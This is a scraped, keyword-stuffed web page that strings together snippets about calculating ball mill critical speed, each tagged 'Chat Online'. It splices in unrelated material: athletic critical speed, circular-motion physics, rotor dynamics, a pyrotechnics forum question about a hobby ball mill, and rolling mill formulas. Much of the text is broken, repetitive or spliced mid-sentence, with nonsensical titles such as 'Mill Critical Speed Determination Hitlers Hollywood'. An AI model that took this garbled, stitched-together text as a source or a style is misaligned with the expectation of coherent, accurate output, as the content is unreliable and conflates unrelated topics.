https://optiekmarcbrabanders.be/Mar-21/668.html
[ "# how to calculate mill critcal speed\n\n• ### How to determine your critical speed ACTIVE\n\nIf you want to race to your full potential it is helpful to determine your critical speed. On paper the athlete with the fastest overall critical speed in three events will most likely be the victor. Critical speed (CS) represents your race pace for any endurance event lasting between 30 and 60 minutes.\n\nChat Online\n• ### critical speed ball mill calculation\n\nTECHNICAL NOTES 8 GRINDING RP KingMineral Technologies complicated in practice and it is not possible to calculate The critical speed of the mill c is defined as the speed\n\nChat Online\n• ### (PDF) Planetary Ball Mill Process in Aspect of Milling Energy\n\nA read is counted each time someone views a publication summary (such as the title abstract and list of authors) clicks on a figure or views or downloads the full-text.\n\nChat Online\n• ### Critical Speed Calculator Nook Industries\n\nCRITICAL SPEED Enter any TWO of the following and click on the \"Calculate\" button\n\nChat Online\n• ### critical speed of ball mill calculation pdf\n\nformula critical speed ball mill . calculate critical speed of ball mill ugcnetnic. Ball Mill Critical Speed Mineral Processing . 10 A Ball Mill Critical Speed (actually ball rod AG or SAG) is the speed at which the centrifugal forces equal gravitational forces at the mill shells inside get price.\n\nChat Online\n• ### What it is the optimun speed for a ball mill\n\nOct 19 2006 · What it is the optimun speed for a ball mill posted in Pyrotechnics I have done a ball mill recenly finished but the motor has too rpms is too fast for use in a ball mill (the pvc cylinder that i use left of the shafts). 
With the motor i will use a 40 mm pulley because i have a 50 mm driven pulley in one of my two shafts.\n\nChat Online\n• ### How to calculate critical speed in circular motion\n\nApr 14 2012 · In one textbook it says that the critical speed is the minimum speed at which an object can complete the circular motion. It gives the formula v = square root of (g r) However in another textbook it says that the formula is v = square root of (2 g r) How can there be two different\n\nChat Online\n• ### Critical speedWikipedia\n\nThere are two main methods used to calculate critical speed—the Rayleigh–Ritz method and Dunkerley s method. Both calculate an approximation of the first natural frequency of vibration which is assumed to be nearly equal to the critical speed of rotation. The Rayleigh–Ritz method is\n\nChat Online\n• ### Critical Speed Of Mill\n\nhow to calculate critical speed of ball millSBM Machine. Mill Critical Speed Calculation deflection of the lifters is smaller for lower critical speeds. Read more. critical speed of a mill. The Influence of Ball Mill Critical Speed on Production Efficiency. When the rotating speed of ball mill grinder is high the height the ball\n\nChat Online\n• ### calculate critical speed of ball millPopular Education\n\ncomplicated in practice and it is not possible to calculate The critical speed of the mill c is defined as the speed at which a single ball will just . Rod and ball mills in Mular AL and Bhappu R B Editors Mineral Processing Plant Design. Read More.\n\nChat Online\n• ### How to calculate critical speed of ball millHenan\n\nCritical speed of ball mill calculation grinder. 
Calculations for mill motor power mill speed and media charge Advantages Considering the weight of mill lining and grinding media work out the motor power required in consultation To calculate the motor power required for a cylindrical type ball mill the following formula can be applied Where Nc Critical speed\n\nChat Online\n• ### ball mill calculations critical speedJack Higgins\n\ncalculating critical speed in a ball mill uae Ball Mill Critical Speed Mineral Processing Metallurgy A Ball Mill Critical Speed actually ball rod AG or SAG is the speed at which the centrifugal forces equal gravitational forces at the mill shells inside surface and no balls will fall from its position onto the shell.\n\nChat Online\n• ### mill critical speed formulaJack Higgins\n\nMill Critical Speed Determination. The \"Critical Speed\" for a grinding mill is defined as the rotational speed where centrifugal forces equal gravitational forces at the mill shell s inside surface. This is the rotational speed where balls will not fall away from the mill s shell. Read More\n\nChat Online\n• ### how to calculate aluminum poweder ball mill critical speed\n\nhow to calculate the ball need in ball mill . Critical Speed Calculation Of Ball Mill. ball mill calculation critical speed wildpeppersf. 7 Nov 2013 The critical speed of the mill c is defined as the speed at which a single ball will just remain ball mill critical speed calculation where society/organization is ball mill critical speed\n\nChat Online\n• ### how to calculate critical speed of ball mill\n\nformula for critical speed of rotation of a ball mill. formula for critical speed of a rotating mill dieboldbau. 
ball mill critical speed calculation Ball mill critical speed Ball mill efficiency ball mill and now only the calculation formula on critical speed Critical rotation speed for ballmilling where D is the inner diameter of a jar and r is the radius of balls.\n\nChat Online\n• ### Mill Critical Speed DeterminationHitlers Hollywood\n\ncritical speed formula for ball mill The formula to calculate critical speed is given below N c = 42.305/sqrt(D-d) N c = critical speed of the mill D = mill diameter specified in meters d = diameter of the ball In practice Ball Mills are driven at a speed of 50–90% of the critical speed the\n\nChat Online\n• ### critical speed of grinding mill calculation\n\nThe formula to calculate critical speed is given below. N c = 42.305/sqrt(D-d) N c = critical speed of the mill. D = mill diameter specified in meters. d = diameter of the ball. In practice Ball Mills are driven at a speed of 50–90% of the critical speed the factor being influenced by economic consideration.\n\nChat Online\n• ### ball mill critical speed calculation xls\n\nball mill critical speed calculation xls. how to calculate critical speed of ball mill More information of critical speed of ballmill calculation ball mill critical speed calculation xls. OBTENIR UN PRIX. ball mill calculations excelXinHaigreekhotelguide.\n\nChat Online\n• ### critical speed of ball mill calculation\n\nSAGMILLING . . Mill Critical Speed Determination. The \"Critical Speed\" for a grinding mill is defined as the rotational speed where This is the rotational speed where balls will not fall away from the mill s shell. 
You may use the Mill Liner Effective\n\nChat Online\n• ### Ball Mill Critical Speed\n\nA Ball Mill Critical Speed (actually ball rod AG or SAG) is the speed at which the centrifugal forces equal gravitational forces at the mill shell s inside surface and no balls will fall from its position onto the shell. The imagery below helps explain what goes on inside a mill as speed varies.\n\nChat Online\n• ### Rolling mill speed calculation formula pdf\n\nrolling mill speed calculation formula 2 plays an important role in calculating the rolling.shapes are calculated. Six pass designs used in Swedish mills are analysed. The thesis also includes high-speed rolling of. Calculate those costs.mill roll speeds are usually given in feetminute we. We now have to calculate the peripheral speed of the mill.\n\nChat Online\n• ### calculate critical speed of ball mill\n\ncalculate critical speed of ball mill calculate critical speed of ball mill. Ball mill . A ball mill is a type of grinder used to grind and blend materials for use in mineral dressing The grinding works on the principle of critical speed. 
Size Reduction and Mill SpeedCritical Calculating how fast a Jar needs to spin is a little\n\nChat Online\n• ### sag mill critical speed calculation\n\nsag mill critical speed calculation. Ball Mill Critical SpeedMineral Processing Metallurgy. A Ball Mill Critical Speed (actually ball rod AG or SAG) is the speed at which the centrifugal forces equal gravitational forces at the mill shell s inside surface and no balls will fall from its position onto the shell.\n\nChat Online" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8320014,"math_prob":0.9566801,"size":8784,"snap":"2021-43-2021-49","text_gpt3_token_len":1819,"char_repetition_ratio":0.26617312,"word_repetition_ratio":0.4261745,"special_character_ratio":0.19000456,"punctuation_ratio":0.042976268,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98210806,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-27T20:27:03Z\",\"WARC-Record-ID\":\"<urn:uuid:7921fa19-05f5-45c9-a09b-e5a3c6cb0173>\",\"Content-Length\":\"17009\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b0cb1bfa-653f-42cd-80d5-44d85d5b6fd7>\",\"WARC-Concurrent-To\":\"<urn:uuid:8791110c-ce79-4393-8a8f-8208195b4e1e>\",\"WARC-IP-Address\":\"104.21.71.35\",\"WARC-Target-URI\":\"https://optiekmarcbrabanders.be/Mar-21/668.html\",\"WARC-Payload-Digest\":\"sha1:XIZOBFDPADI2MM7S72TR3EIPAZ47SIZC\",\"WARC-Block-Digest\":\"sha1:HDOZYXOAOZ7HX7UROT52KPN6GS6YD7EP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323588242.22_warc_CC-MAIN-20211027181907-20211027211907-00515.warc.gz\"}"}
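The critical-speed formula quoted in the record above, N c = 42.305/sqrt(D-d) with D and d in meters, is easy to sanity-check numerically. The sketch below is illustrative only: the drum and ball diameters are made-up example values, not taken from the source.

```python
import math

def mill_critical_speed(mill_diameter_m, ball_diameter_m):
    """Critical speed N_c in rpm, per the quoted formula
    N_c = 42.305 / sqrt(D - d), with D and d in meters."""
    if mill_diameter_m <= ball_diameter_m:
        raise ValueError("mill diameter must exceed ball diameter")
    return 42.305 / math.sqrt(mill_diameter_m - ball_diameter_m)

# Illustrative example: a 2 m mill charged with 50 mm balls
nc = mill_critical_speed(2.0, 0.05)
print(f"critical speed ≈ {nc:.1f} rpm")                      # ≈ 30.3 rpm
print(f"50–90% operating range: {0.5 * nc:.1f}–{0.9 * nc:.1f} rpm")
```

The last line reflects the scraped text's note that mills are typically driven at 50–90% of the critical speed.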
https://eng.kakprosto.ru/kommunalnye-uslugi?page=3
[ "Utilities\n• How to take readings from a three-phase meter\n• How to calculate the cost of water\n• How to install running water in a private house\n• How to fill out a receipt for payment of electricity\n• Where to call if there is no electricity\n• Where to send water meter readings\n• How to refuse a radio receiving station in Moscow\n• How to install garbage bins in the yard in accordance with the regulations\n• Which gas meter is better to install\n• How to reprogram a key from the intercom\n• How to apply for utility benefits\n• Where to call if the hot water is turned off\n• If the electricity shelf life\n• Where to go if there is no water\n• How to calculate the rent\n• How to run water to a plot of land\n• How not to pay for gas by the meter\n• How to pay utility bills\n• How to save gas\n• Do I have to install water meters\n• How to charge for cold water\n• What is the multitariff meter\n• How to choose a gas meter\n• How to calculate utilities\n• How to take readings from a Mercury 200 meter\n• How to call an electrician\n• What documents are needed for connecting electricity to a non-residential plot\n• How to calculate the tariff for hot water\n• How to turn off the radio\n• How to get free electricity", null, "" ]
[ null, "https://tms.dmp.wi-fi.ru/", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8908961,"math_prob":0.7743178,"size":1181,"snap":"2021-31-2021-39","text_gpt3_token_len":284,"char_repetition_ratio":0.23194562,"word_repetition_ratio":0.029166667,"special_character_ratio":0.23539373,"punctuation_ratio":0.0,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9537971,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-08-01T01:26:12Z\",\"WARC-Record-ID\":\"<urn:uuid:6f681556-651c-4dca-80ff-16b82462a0ea>\",\"Content-Length\":\"72319\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a22d3373-dd26-41a5-a19f-4b676bfc9be6>\",\"WARC-Concurrent-To\":\"<urn:uuid:7c3c549d-bf17-4e63-9977-8c1e0d711fe3>\",\"WARC-IP-Address\":\"178.154.246.3\",\"WARC-Target-URI\":\"https://eng.kakprosto.ru/kommunalnye-uslugi?page=3\",\"WARC-Payload-Digest\":\"sha1:ATB5NFUKWGUWC5COLKKZX4DN7JYC3LJE\",\"WARC-Block-Digest\":\"sha1:RBJSAGMINWVZFQTNAHUMODHLDA3L6KCX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154127.53_warc_CC-MAIN-20210731234924-20210801024924-00684.warc.gz\"}"}
https://zbmath.org/?q=an:0747.93071
[ "# zbMATH — the first resource for mathematics\n\nControl of a chaotic system. (English) Zbl 0747.93071\nGiven a Lorenz system subject to control $\dot x_1=-sx_1+sx_2,\ \dot x_2=rx_1-x_2-x_1x_3+u,\ \dot x_3=x_1x_2-bx_3,$ the authors suggest two different controllers to stabilize an unstable equilibrium point of the uncontrolled system. They analyze a particular case $$s=10$$, $$r=28$$, $$b=8/3$$, which has three unstable equilibrium points.\nThe first controller is given by $$u=-k(x_1-x_{10})$$. Then a sufficiently large $$k>0$$ guarantees the stability, but the motion may contain chaotic transients of different time lengths depending on the magnitude of $$k$$.\nIn the second case, the controllability minimum principle produces a stabilizing bang-bang control $$u=-10\,\text{sgn}(x_1^2-(8/3)x_3)$$.\nReviewer: J.Kucera (Pullman)\n\n##### MSC:\n 93D15 Stabilization of systems by feedback 93C10 Nonlinear systems in control theory 93C15 Control/observation systems governed by ordinary differential equations\nFull Text:\n##### References:\n J. Brindley and I. M. Motoz, ”Lorenz attractor behavior in a continuously stratified baroclinic fluid,”Phys. Lett., vol. 77A, pp. 441–444, 1980. P. Ehrhard and U. Müller, ”Dynamical behavior of natural convection in a single-phase loop,”J. Fluid Mech. (in press). J.E. Gayek and T.L. Vincent, ”On the asymptotic stability of boundary trajectories,”Int. J. Control, vol. 41, pp. 1077–1086, 1985. · Zbl 0562.93078 J.D. Gibbon and M.J. McGuinness, ”A derivation of the Lorenz equation for some unstable dispersive physical systems,”Phys. Lett., vol. 77A, pp. 295–299, 1980. W.J. Grantham and T.L. Vincent, ”A controllability minimum principle,”J. Optimization Theory Applications, vol. 17, pp. 93–114, 1975. · Zbl 0292.93002 H. Haken, ”Analogy between higher instabilities in fluids and lasers,”Phys. Lett., vol. 53A, pp. 77–78, 1975. J.L. Kaplan and J.A. 
Yorke, ”Preturbulence: a regime observed in a fluid flow model of Lorenz,”Commun. Math. Phys., vol. 67, pp. 93–108, 1979. · Zbl 0443.76059 E. Knobloch, ”Chaos in a segmented disc dynamo,”Phys. Lett., vol. 82A, pp. 439–440, 1981. E.N. Lorenz, ”Deterministic non-periodic flow,”J. Atmos. Sci., vol. 20, pp. 130–141, 1963. · Zbl 1417.37129 W.V.R. Malkus, ”Non-periodic convection at high and low Prandtl number,”Mémoires Société Royale des Sciences de Liège, Series 6, vol. 4, pp. 125–128, 1972. J. Pedlosky, ”Limit cycles and unstable baroclinic waves,”J. Atmos. Sci., vol. 29, p. 53, 1972. J. Pedlosky and C. Frenzen, ”Chaotic and periodic behavior of finite amplitude baroclinic waves,”J. Atmos. Sci., vol. 37, pp. 1177–1196, 1980. C. Sparrow, ”The Lorenz equations: bifurcations, chaos, and strange attractors,”Appl. Math. Sci., vol. 41, 1982. · Zbl 0504.58001 E.D. Yorke and J.A. Yorke, ”Metastable chaos: transition to sustained chaotic behavior in the Lorenz model,”J. Stat. Phys., vol. 21, pp. 263–277, 1979.\nThis reference list is based on information provided by the publisher or from digital mathematics libraries. Its items are heuristically matched to zbMATH identifiers and may contain data conversion errors. It attempts to reflect the references listed in the original paper as accurately as possible without claiming the completeness or perfect precision of the matching." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.69030535,"math_prob":0.93608135,"size":3617,"snap":"2021-43-2021-49","text_gpt3_token_len":1180,"char_repetition_ratio":0.109880984,"word_repetition_ratio":0.00754717,"special_character_ratio":0.34089023,"punctuation_ratio":0.27272728,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9891615,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-06T00:01:44Z\",\"WARC-Record-ID\":\"<urn:uuid:4ec19106-8c83-488f-ace0-81963d31267e>\",\"Content-Length\":\"52840\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:974a4d0f-5220-4c44-9910-1b6cb74e3cf5>\",\"WARC-Concurrent-To\":\"<urn:uuid:eb6be642-6d14-49a5-a33d-eb41ac113076>\",\"WARC-IP-Address\":\"141.66.194.2\",\"WARC-Target-URI\":\"https://zbmath.org/?q=an:0747.93071\",\"WARC-Payload-Digest\":\"sha1:GKS7LAOBHY225RTMUU2GYDBS3OKVP2Y5\",\"WARC-Block-Digest\":\"sha1:NHAIEGQ3MKON22UUWAQUVNIZMFOJ5O5T\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964363226.68_warc_CC-MAIN-20211205221915-20211206011915-00487.warc.gz\"}"}
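As a quick check on the system reviewed above: with u = 0, the nonzero equilibria of the Lorenz equations sit at x1 = x2 = ±sqrt(b(r-1)), x3 = r-1, and for the cited parameters s = 10, r = 28, b = 8/3 this yields the three equilibrium points the review mentions. A minimal sketch (the function and variable names are our own, not from the paper):

```python
import math

def lorenz_equilibria(s, r, b):
    """Equilibrium points of x1' = -s*x1 + s*x2, x2' = r*x1 - x2 - x1*x3,
    x3' = x1*x2 - b*x3 (the uncontrolled system, u = 0)."""
    if r <= 1:
        return [(0.0, 0.0, 0.0)]            # only the origin below r = 1
    c = math.sqrt(b * (r - 1))
    return [(0.0, 0.0, 0.0), (c, c, r - 1), (-c, -c, r - 1)]

eqs = lorenz_equilibria(10, 28, 8 / 3)
print(eqs[1])   # → (8.4852..., 8.4852..., 27)
```

Note that sqrt(b(r-1)) = sqrt((8/3)·27) = sqrt(72) ≈ 8.485, matching x3 = r-1 = 27.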
http://www.next.gr/circuits/Circuit-diagram-for-generating-time-delay-with-555-IC-l43623.html
[ "# Circuit diagram for generating time delay with 555 IC\n\nPosted on Feb 6, 2014\n\nThis circuit-based project demonstrates the working of a 555 timer in astable mode to generate pulses with a time period of 0.5 second. This pulse can be further used for anything where we need a pulse, such as to blink a LED or to create fashionable blinking lights. Image below shows internal circuitry of the NE555 timer, which can be used in astable and monostable mode: The circuit of this project makes use of timer IC NE555, which produces a constant square pulse of a desired frequency. This pulse could be either triggered or produced continuously depending upon the mode of 555 we are using. The two most used modes of 555 are Monostable and Astable. Here it is used in the astable mode with a time period of half a second: a high time period of 0.333 seconds and a low time period of 0.166 seconds. For astable mode the total time period is ln2*C*(R1+2*R2), with a high time period of ln2*(R1+R2)*C and a low time period of ln2*R2*C. Here R1 is the resistor connected between VCC and pin7 (discharge pin), R2 is between pin7 and pin2 (trigger pin), and C1 is the capacitor connected from pin2 to ground. For 555 to function in astable mode, pin2 and pin6 (threshold) must be shorted. Reset pin is connected to VCC. The output of 555 is taken at pin3 in the form of a square wave and is then fed to the lighting circuit, which glows when the output is high and stops when it becomes low, thereby producing a pattern of blinking lights. By varying the values of R1, R2 and C1, square waves of different time periods can be obtained.\n\nLeave Comment", null, "characters left:\n\n• ## New Circuits\n\n.\n\nPopular Circuits\n\n12KV High Voltage Generator\nBCD seven sections of nixie tubes reveal the decoder circuit\nXENON STROBE\nMultiple Capacitor Charger\n\nTop", null, "" ]
[ null, "http://www.next.gr/templates/nova/img/no-avatar.png", null, "http://www.next.gr/circuits/cron.php", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.948904,"math_prob":0.96680653,"size":3963,"snap":"2022-27-2022-33","text_gpt3_token_len":861,"char_repetition_ratio":0.10659257,"word_repetition_ratio":0.0,"special_character_ratio":0.22104466,"punctuation_ratio":0.113065325,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9587237,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-19T04:35:05Z\",\"WARC-Record-ID\":\"<urn:uuid:6ee03255-dc89-4c8c-921e-ad58d494c7e7>\",\"Content-Length\":\"83376\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:75b7c799-81cf-4da8-a2a1-e348247206bc>\",\"WARC-Concurrent-To\":\"<urn:uuid:89e20e75-af44-4ad7-8ab3-b546da095331>\",\"WARC-IP-Address\":\"198.211.126.132\",\"WARC-Target-URI\":\"http://www.next.gr/circuits/Circuit-diagram-for-generating-time-delay-with-555-IC-l43623.html\",\"WARC-Payload-Digest\":\"sha1:7RXHHDSB2XP6IZZQ7UBD6XIBW5E4DKTB\",\"WARC-Block-Digest\":\"sha1:ZSI2RNAZ7USXUDQMYSIXK4Y2JUIQXNI3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882573623.4_warc_CC-MAIN-20220819035957-20220819065957-00628.warc.gz\"}"}
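The astable timing relations quoted in the article (t_high = ln2·(R1+R2)·C, t_low = ln2·R2·C) can be checked in a few lines. The component values below are one illustrative choice that lands near the article's 0.5 s period with a 0.333 s / 0.166 s split; they are not values given in the source.

```python
import math

def astable_555(r1_ohm, r2_ohm, c_farad):
    """Timing of a 555 astable: (t_high, t_low, period) in seconds,
    using t_high = ln2*(R1+R2)*C and t_low = ln2*R2*C."""
    t_high = math.log(2) * (r1_ohm + r2_ohm) * c_farad
    t_low = math.log(2) * r2_ohm * c_farad
    return t_high, t_low, t_high + t_low

# Illustrative values: R1 = R2 = 2.4 kΩ, C = 100 µF
t_high, t_low, period = astable_555(2400, 2400, 100e-6)
print(f"high {t_high:.3f} s, low {t_low:.3f} s, period {period:.3f} s")
# → high 0.333 s, low 0.166 s, period 0.499 s
```

With R1 = R2 the high phase is exactly twice the low phase, which matches the 2:1 duty split described in the article.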
https://answers.everydaycalculation.com/subtract-fractions/3-5-minus-1-9
[ "# Answers\n\nSolutions by everydaycalculation.com\n\n## Subtract 1/9 from 3/5\n\n3/5 - 1/9 is 22/45.\n\n#### Steps for subtracting fractions\n\n1. Find the least common denominator or LCM of the two denominators:\nLCM of 5 and 9 is 45\n2. For the 1st fraction, since 5 × 9 = 45,\n3/5 = (3 × 9)/(5 × 9) = 27/45\n3. Likewise, for the 2nd fraction, since 9 × 5 = 45,\n1/9 = (1 × 5)/(9 × 5) = 5/45\n4. Subtract the two fractions:\n27/45 - 5/45 = (27 - 5)/45 = 22/45\n\n#### Subtract Fractions Calculator\n\n-\n\nUse fraction calculator with our all-in-one calculator app: Download for Android, Download for iOS\n\n© everydaycalculation.com" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.60439813,"math_prob":0.995307,"size":325,"snap":"2019-13-2019-22","text_gpt3_token_len":172,"char_repetition_ratio":0.25856698,"word_repetition_ratio":0.0,"special_character_ratio":0.5538462,"punctuation_ratio":0.06185567,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9995129,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-05-25T15:58:21Z\",\"WARC-Record-ID\":\"<urn:uuid:91a45a51-b982-4e15-8081-6c9a1de385a8>\",\"Content-Length\":\"8452\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:12ba3528-06c7-45db-b4a4-024868250615>\",\"WARC-Concurrent-To\":\"<urn:uuid:e1f10c8b-146f-4dd7-841e-b71698a2b45c>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/subtract-fractions/3-5-minus-1-9\",\"WARC-Payload-Digest\":\"sha1:ARZEQ3HBFNOLZEW253HHPQH2Y7ZZKTEE\",\"WARC-Block-Digest\":\"sha1:S2QFPMUWMOTYHBGJVG6EAGXXF6XT2VE4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-22/CC-MAIN-2019-22_segments_1558232258120.87_warc_CC-MAIN-20190525144906-20190525170906-00228.warc.gz\"}"}
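The worked subtraction above follows the standard common-denominator recipe, which Python's `fractions` module reproduces directly (`math.lcm` requires Python ≥ 3.9):

```python
from fractions import Fraction
from math import lcm  # Python >= 3.9

a, b = Fraction(3, 5), Fraction(1, 9)

# Step 1: least common denominator of 5 and 9
lcd = lcm(a.denominator, b.denominator)                  # 45

# Steps 2-3: scale each fraction to the common denominator
a_scaled = (a.numerator * (lcd // a.denominator), lcd)   # (27, 45)
b_scaled = (b.numerator * (lcd // b.denominator), lcd)   # (5, 45)

# Step 4: subtract; Fraction reduces to lowest terms automatically
diff = a - b
print(diff)   # → 22/45
```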
https://papers.nips.cc/paper_files/paper/2020/file/4607f7fff0dce694258e1c637512aa9d-Review.html
[ "NeurIPS 2020\n\n### Review 1\n\nSummary and Contributions: This paper studies active learning with label and comparison queries, extending the works of (Kane et al, 2017, Xu et al, 2017). It gives a new set of fundamental upper and lower bounds on halfspace learning in passive/active, label/label+comparison queries, PAC/RPU (Reliably Probably Useful) models, summarized in Tables 1 and 2 in the paper. - On the lower bound side, it shows that any label-only active learning algorithm must have polynomial query complexity in the PAC learning setting, and exponential sample complexity in the RPU learning setting. The main techniques use existing combinatorial geometry results. - On the upper bound side, it shows that under mild distributional assumptions, label+comparison based active learning algorithms can have logarithmic query complexity in both PAC and RPU learning settings. The main technique is the development of a distribution-dependent variant of inference dimension (Kane et al, 2017) and a novel online-to-batch conversion (Thm 4.11).\n\nStrengths: Overall, I think it is a solid paper that greatly advances the understanding of RPU learning and learning with comparison queries. Specifically: - The development of distribution-dependent inference dimension is an important contribution, which can help spur more work in distribution-dependent analysis of machine learning (similar to Hanneke's disagreement coefficient / Alexander's capacity function for active and passive learning) - The proof of Theorem 4.10 (distribution-dependent inference dimension for halfspaces) is not trivial, in my understanding. 
I was initially wondering whether some arguments therein can be simplified by using (normalized) VC inequalities, but it does not lead to g(n) = 2^{-Omega(n^{1+\\alpha})} for some positive alpha, which is crucial for obtaining the results in this paper.\n\nWeaknesses: - Many of the lower bounds seem to be direct applications of existing results of combinatorial geometry (although the tightness of these results is also discussed, and they nicely extend the early negative results of Kivinen on RPU learning)\n\nCorrectness: They are correct as far as I have checked, although there are a few subtle points on which I need the authors' clarification.\n\nClarity: While I can understand the statements in this paper, I think the presentation can be much improved. For example: - As RPU learning implies PAC learning, is there really a need to present Algorithm 1 and Theorem 3.5? Aren't we already happy with Theorem 4.11? - In Algorithm 1, Threshold(S) is only informally defined, and an elaboration is needed. I think basically, the algorithm can successfully approximately recover b if it can find two neighboring + and - examples? - In the proof of Proposition 4.2, no high-level idea of the proof was given, which makes it a bit hard to follow (although I agree that it is correct) - In the second half of Corollary 4.7, is the goal only to identify the labels of all examples S drawn? Also, what is the active learning algorithm used here? I am also confused about the statement that \"the boosting algorithm in KLMZ is reliable even when given the wrong inference dimension as input\". Are you referring to the algorithm on page 16 of that paper (arxiv version)? - In Theorem 4.9, is H here H_{d, \\eta}? - In the proof of Theorem 4.10, what is h \\times [-\\gamma, \\gamma]? Is it {x: h(x) \\in [-\\gamma, \\gamma]}? - At the end of the proof of Theorem 4.10, it is said that \"\\forall h there must exists x, s.t. 
Q(S_h' - {x}) infers x.\" Would it still be possible that there exist two hypotheses h_1, h_2 that have _very small minimal-ratio_, and they agree with the queries in Q(S_h' - {x}), but disagree on x? - In Algorithm 2, if g is a constant function, can we just replace it with a constant? To align with the terminology of KLMZ as much as possible, I suggest changing the name \"average inference dimension\" to e.g. \"inference dimension tail bound\". I think people usually use \"dimension\" to denote values that are integers.\n\nRelation to Prior Work: Yes. It also discusses a subsequent paper that benefits from the techniques in this paper.\n\nReproducibility: Yes\n\nAdditional Feedback: I thank the authors for the reply. My opinion has not changed. But I have follow-up questions that I hope the authors can clarify in the final version: 1. In the second half of Corollary 4.7, in the active RPU learning algorithm, do we need to first compute the value of k that minimizes the right hand side of the equation, then apply KLMZ's algorithm with that value of k? It might be interesting to extend KLMZ's algorithm and analysis to achieve adaptivity to the data-dependent inference dimension. 2. In Theorem 4.10, it would be very helpful to point out what the inference algorithm used here is (it is still not clear to me if the inference algorithm needs to know the minimal-ratio or not - specifically, in the linear program alluded to on page 16 of KLMZ, in combination with Claim 4.10 therein, it seems like the knowledge of minimal-ratio is needed). The algorithm right below Theorem 4.11 should be revised accordingly to incorporate this.\n\n### Review 2\n\nSummary and Contributions: This paper studies the power of comparisons in the problem of actively learning (non-homogenous) linear classifiers. 
There are three main results in the paper: 1) in the PAC learning model, neither active learning nor comparison queries alone provide a significant speed-up over passive learning; 2) in the RPU-learning model, the paper confirms that passive learning with label queries is intractable information-theoretically, and active learning alone provides little improvement; 3) in the RPU-learning model, the comparison oracle provides a significant improvement in both active and passive learning scenarios. In the context of previous work, the techniques of this paper are heavily based on a combination of the inference dimension (Kane, Lovett, Moran, and Zhang ) and the (non-efficient version of) margin-based active learning (Balcan and Long ). The paper also extends the analysis to the s-concave distribution based on a concentration result in Balcan and Zhang .\n\nStrengths: 1. Learning of linear classifiers with both comparison and label oracles has rarely been studied in the literature; to the best of my knowledge, existing work includes Kane, Lovett, Moran, and Zhang and Xu, Zhang, Miller, Singh, and Dubrawski , but many fundamental questions remain open in the community. Using existing techniques, this paper answers many of these questions. 2. The techniques are novel for the NeurIPS standard. The theoretical analysis seems solid. 
Experiments are included, which is commendable for a theoretical paper.\n\nWeaknesses: The paper does not consider computational efficiency and noise tolerance (given that the paper is built upon , which is a computationally-inefficient algorithm), while techniques for achieving computational efficiency and noise tolerance are available in the existing work on active learning.\n\nCorrectness: The claims and method are correct to me.\n\nClarity: The paper is well-written and easy to understand.\n\nRelation to Prior Work: The paper did a good job of discussing how this work differs from previous contributions.\n\nReproducibility: Yes\n\nAdditional Feedback: ==========after rebuttal========== I have read the rebuttal, and I am happy to recommend acceptance of this paper.\n\n### Review 3\n\nSummary and Contributions: I have reviewed this paper before; the following is an adaptation of my past review. This paper considers the problem of learning non-homogenous linear classifiers using comparison queries over distributions that are weakly concentrated (such as s-concave). The main focus of the paper is on the power of comparison queries for distribution-dependent and Reliably Probably Useful (RPU) learning. Comparison queries, in addition to the labels, reveal which of two instances is closer to the boundary of the classifier. Comparison queries were shown to be useful for improving the query complexity of a learning task. Kane et al.’17 considered the distribution-independent setting and showed that under assumptions, such as a large-margin assumption, comparison queries gain an exponential improvement in query complexity over (label) active learning. The same paper also showed that in some cases, query complexity won’t have an asymptotic improvement over passive or active learning, based on a definition of a notion of “inference dimension”. An example of this is learning halfspaces in a distribution-independent setting even in R^3. 
